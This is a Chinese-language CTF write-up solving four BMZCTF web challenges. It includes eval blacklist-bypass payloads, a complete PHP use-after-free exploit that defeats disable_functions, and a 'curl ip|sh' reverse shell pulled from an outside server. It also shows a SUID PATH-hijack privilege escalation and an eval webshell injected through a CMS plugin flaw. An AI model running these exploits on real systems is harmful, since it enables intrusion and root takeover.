文章目錄
- ezeval
- ezphp
- penetration
- BMZ_Market
前言
首先恭喜
白帽子社區團隊成功舉辦第一屆BMZCTF公開賽,我是本次比賽MISC賽題Snake、Tiga的出題人末初
以下是我對于的這次BMZCTF公開賽的WEB賽題的一些Writeup,如果有什么寫的不對的還請師傅們留言斧正
ezeval
<?php
highlight_file(__FILE__);
$cmd=$_POST['cmd'];
$cmd=htmlspecialchars($cmd);
$black_list=array('php','echo','`','preg','server','chr','decode','html','md5','post','get','file','session','ascii','eval','replace','assert','exec','cookie','$','include','var','print','scan','decode','system','func','ini_','passthru','pcntl','open','link','log','current','local','source','require','contents');
$cmd = str_ireplace($black_list,"BMZCTF",$cmd);
eval($cmd);
?>
這里代碼執行繞過方法很多
字串拼接繞過
cmd=(s.y.s.t.e.m)('cat /flag');
進制編碼繞過
cmd=hex2bin('73797374656d')('cat /flag');
異或繞過
import string
char = string.printable
cmd = 'system'
tmp1,tmp2 = '',''
for res in cmd:
for i in char:
for j in char:
if(ord(i)^ord(j) == ord(res)):
tmp1 += i
tmp2 += j
break
else:
continue
break
print(tmp1,tmp2)
cmd=('0000000'^'CICDU]')('cat /flag');
還有很多別的方法可以繞過,就不一一贅述了
ezphp
<?php
highlight_file(__FILE__);
$cmd=$_POST['a'];
if(strlen($cmd) > 25){
die();
}else{
eval($cmd);
}
phpinfo()查看下
disable_functions發現大量禁用函式
pcntl_alarm
pcntl_fork
pcntl_waitpid
pcntl_wait
pcntl_wifexited
pcntl_wifstopped
pcntl_wifsignaled
pcntl_wifcontinued
pcntl_wexitstatus
pcntl_wtermsig
pcntl_wstopsig
pcntl_signal
pcntl_signal_get_handler
pcntl_signal_dispatch
pcntl_get_last_error
pcntl_strerror
pcntl_sigprocmask
pcntl_sigwaitinfo
pcntl_sigtimedwait
pcntl_exec
pcntl_getpriority
pcntl_setpriority
pcntl_async_signals
system
exec
shell_exec
popen
proc_open
passthru
symlink
link
syslog
imap_open
ld
dl
mail
gc_collect_cycles
getenv
unserialize
putenv
serialize
Imagick��
putenv被過濾了,那LD_PRELOAD & putenv()的bypass disable function的方法肯定不行了
先繞過strlen()限制,上線蟻劍
a=eval($_POST[mochu7]);&mochu7=phpinfo();
蟻劍的Bypass disable function插件無法支持利用
然后在先知找到一篇UAF bypass PHP disabled functions的文章的exp可以利用
原文地址:https://xz.aliyun.com/t/8355#toc-3
exp.php
<?php
error_reporting(0);
$a = str_repeat("T", 120 * 1024 * 1024);
function i2s(&$a, $p, $i, $x = 8) {
for($j = 0;$j < $x;$j++) {
$a[$p + $j] = chr($i & 0xff);
$i >>= 8;
}
}
function s2i($s) {
$result = 0;
for ($x = 0;$x < strlen($s);$x++) {
$result <<= 8;
$result |= ord($s[$x]);
}
return $result;
}
function leak(&$a, $address) {
global $s;
i2s($a, 0x00, $address - 0x10);
return strlen($s -> current());
}
function getPHPChunk($maps) {
$pattern = '/([0-9a-f]+\-[0-9a-f]+) rw\-p 00000000 00:00 0 /';
preg_match_all($pattern, $maps, $match);
foreach ($match[1] as $value) {
list($start, $end) = explode("-", $value);
if (($length = s2i(hex2bin($end)) - s2i(hex2bin($start))) >= 0x200000 && $length <= 0x300000) {
$address = array(s2i(hex2bin($start)), s2i(hex2bin($end)), $length);
echo "[+]PHP Chunk: " . $start . " - " . $end . ", length: 0x" . dechex($length) . "\n";
return $address;
}
}
}
function bomb1(&$a) {
if (leak($a, s2i($_GET["test1"])) === 0x5454545454545454) {
return (s2i($_GET["test1"]) & 0x7ffff0000000);
}else {
die("[!]Where is here");
}
}
function bomb2(&$a) {
$start = s2i($_GET["test2"]);
return getElement($a, array($start, $start + 0x200000, 0x200000));
die("[!]Not Found");
}
function getElement(&$a, $address) {
for ($x = 0;$x < ($address[2] / 0x1000 - 2);$x++) {
$addr = 0x108 + $address[0] + 0x1000 * $x + 0x1000;
for ($y = 0;$y < 5;$y++) {
if (leak($a, $addr + $y * 0x08) === 0x1234567812345678 && ((leak($a, $addr + $y * 0x08 - 0x08) & 0xffffffff) === 0x01)){
echo "[+]SplDoublyLinkedList Element: " . dechex($addr + $y * 0x08 - 0x18) . "\n";
return $addr + $y * 0x08 - 0x18;
}
}
}
}
function getClosureChunk(&$a, $address) {
do {
$address = leak($a, $address);
}while(leak($a, $address) !== 0x00);
echo "[+]Closure Chunk: " . dechex($address) . "\n";
return $address;
}
function getSystem(&$a, $address) {
$start = $address & 0xffffffffffff0000;
$lowestAddr = ($address & 0x0000fffffff00000) - 0x0000000001000000;
for($i = 0; $i < 0x1000 * 0x80; $i++) {
$addr = $start - $i * 0x20;
if ($addr < $lowestAddr) {
break;
}
$nameAddr = leak($a, $addr);
if ($nameAddr > $address || $nameAddr < $lowestAddr) {
continue;
}
$name = dechex(leak($a, $nameAddr));
$name = str_pad($name, 16, "0", STR_PAD_LEFT);
$name = strrev(hex2bin($name));
$name = explode("\x00", $name)[0];
if($name === "system") {
return leak($a, $addr + 0x08);
}
}
}
class Trigger {
function __destruct() {
global $s;
unset($s[0]);
$a = str_shuffle(str_repeat("T", 0xf));
i2s($a, 0x00, 0x1234567812345678);
i2s($a, 0x08, 0x04, 7);
$s -> current();
$s -> next();
if ($s -> current() !== 0x1234567812345678) {
die("[!]UAF Failed");
}
$maps = file_get_contents("/proc/self/maps");
if (!$maps) {
cantRead($a);
}else {
canRead($maps, $a);
}
echo "[+]Done";
}
}
function bypass($elementAddress, &$a) {
global $s;
if (!$closureChunkAddress = getClosureChunk($a, $elementAddress)) {
die("[!]Get Closure Chunk Address Failed");
}
$closure_object = leak($a, $closureChunkAddress + 0x18);
echo "[+]Closure Object: " . dechex($closure_object) . "\n";
$closure_handlers = leak($a, $closure_object + 0x18);
echo "[+]Closure Handler: " . dechex($closure_handlers) . "\n";
if(!($system_address = getSystem($a, $closure_handlers))) {
die("[!]Couldn't determine system address");
}
echo "[+]Find system's handler: " . dechex($system_address) . "\n";
i2s($a, 0x08, 0x506, 7);
for ($i = 0;$i < (0x130 / 0x08);$i++) {
$data = leak($a, $closure_object + 0x08 * $i);
i2s($a, 0x00, $closure_object + 0x30);
i2s($s -> current(), 0x08 * $i + 0x100, $data);
}
i2s($a, 0x00, $closure_object + 0x30);
i2s($s -> current(), 0x20, $system_address);
i2s($a, 0x00, $closure_object);
i2s($a, 0x08, 0x108, 7);
echo "[+]Executing command: \n";
($s -> current())("php -v");
}
function canRead($maps, &$a) {
global $s;
if (!$chunkAddress = getPHPChunk($maps)) {
die("[!]Get PHP Chunk Address Failed");
}
i2s($a, 0x08, 0x06, 7);
if (!$elementAddress = getElement($a, $chunkAddress)) {
die("[!]Get SplDoublyLinkedList Element Address Failed");
}
bypass($elementAddress, $a);
}
function cantRead(&$a) {
global $s;
i2s($a, 0x08, 0x06, 7);
if (!isset($_GET["test1"]) && !isset($_GET["test2"])) {
die("[!]Please try to get address of PHP Chunk");
}
if (isset($_GET["test1"])) {
die(dechex(bomb1($a)));
}
if (isset($_GET["test2"])) {
$elementAddress = bomb2($a);
}
if (!$elementAddress) {
die("[!]Get SplDoublyLinkedList Element Address Failed");
}
bypass($elementAddress, $a);
}
$s = new SplDoublyLinkedList();
$s -> push(new Trigger());
$s -> push("Twings");
$s -> push(function($x){});
for ($x = 0;$x < 0x100;$x++) {
$s -> push(0x1234567812345678);
}
$s -> rewind();
unset($s[0]);
/tmp目錄有寫入權限,可以上傳檔案
將exp.php上傳到/tmp然后include('/tmp/exp.php')即可執行命令
可以看到已經執行了php -v
執行/readflag
penetration
<?php
highlight_file(__FILE__);
if(isset($_GET['ip'])){
$ip = $_GET['ip'];
$_=array('b','d','e','-','q','f','g','i','p','j','+','k','m','n','\<','\>','o','w','x','\~','\:','\^','\@','\&','\'','\%','\"','\*','\(','\)','\!','\=','\.','\[','\]','\}','\{','\_');
$blacklist = array_merge($_);
foreach ($blacklist as $blacklisted) {
if (strlen($ip) <= 18){
if (preg_match ('/' . $blacklisted . '/im', $ip)) {
die('nonono');
}else{
exec($ip);
}
}
else{
die("long");
}
}
}
?>
過濾了一些字符,exec無回顯,考慮反彈shell
限制了長度,所以直接輸入反彈shell的payload行不通
可以將反彈shell的payload寫在云服務器上,然后通過curl ip|sh來反彈
這里ip過濾了點,可以轉換為十進制來彈
傳入?ip=curl ip的十進制|sh 自己的服務器監聽7777埠即可得到shell
得到shell后發現根目錄下沒有flag,猜測在root目錄下,需要進行提權
使用suid進行提權
查看具有suid的命令
find / -perm -u=s -type f 2>/dev/null
發現一個奇怪的命令,執行一下
發現該命令使用了ps命令,并且未使用絕對路徑,所以可以嘗試更改$PATH來執行該檔案
環境變數提權
cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH #將/tmp添加到環境變數中
love
BMZ_Market
查看源代碼
嘗試偽協議讀取原始碼
/?lang=php://filter/read=convert.base64-encode/resource=index
<?php
$password ="Nevergiveup135." ;//I have to remember it
if (isset($_GET['lang']))
{
include($_GET['lang'].".php");
}
?>
<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="BMZ Market">
<meta name="author" content="bmz">
<title>BMZ Market</title>
<link href="bootstrap.css" rel="stylesheet">
<link href="covers.css" rel="stylesheet">
</head>
<body class="text-center">
<div class="cover-container d-flex w-100 h-100 p-3 mx-auto flex-column">
<header class="masthead mb-auto">
<div class="inner">
<h3 class="masthead-brand">BMZ Market</h3>
<nav class="nav nav-masthead justify-content-center">
<a class="nav-link active" href="#">Home</a>
<!-- <a class="nav-link active" href="?lang=fr">Fr/a> -->
</nav>
</div>
</header>
<main role="main" class="inner cover">
<h1 class="cover-heading">Coming soon</h1>
<p class="lead">
<?php
if (isset($_GET['lang']))
{
echo $message;
}
else
{
?>
Believe in yourself, you can find the flag
<?php
}
?>
</p>
<p class="lead">
<a href="#" class="btn btn-lg btn-secondary">more</a>
</p>
</main>
<footer class="mastfoot mt-auto">
<div class="inner">
<p>Power by<a href="#">@kuaile</a></p>
</div>
</footer>
</div>
</body></html>
得到一個密碼:Nevergiveup135.
可能是后臺賬號密碼
接著資訊收集發現robots.txt
base64解碼得到AAencode編碼
aaencode解碼:http://www.atoolbox.net/Tool.php?Id=703
alert("Challenger, the background of the website is -.../--/--../.-/-../--/../-.");
摩斯解碼:http://www.zhongguosou.com/zonghe/moErSiCodeConverter.aspx
BMZADMIN
嘗試訪問bmzadmin.php
用戶名填網站首頁的:kuaile
密碼填原始碼中發現的:Nevergiveup135.
登入后臺
查看原始碼,在title中發現網站版本
不是什么最新的版本,直接搜索引擎找相關漏洞
直接參考:https://www.cnblogs.com/jinqi520/p/11274699.html
利用Weapp.php檔案中的create()方法接收了請求中的引數,過濾后直接存入php組態檔中,但是由于過濾不嚴,導致可以直接寫入代碼進去并執行,
首先點擊功能開關然后點擊開啟插件應用
然后點擊插件應用,點擊插件開發者
創建插件,填寫相關資料,抓包
控制scene引數寫入shell
&scene=bbb\',${eval($_POST[mochu7])},//
bmzadmin.php成功寫入shell
上蟻劍,sudo -l發現當前用戶可以root身份執行所有操作
轉載請註明出處,本文鏈接:https://www.uj5u.com/ruanti/242950.html
標籤:其他
上一篇:演算法分析與設計考試演算法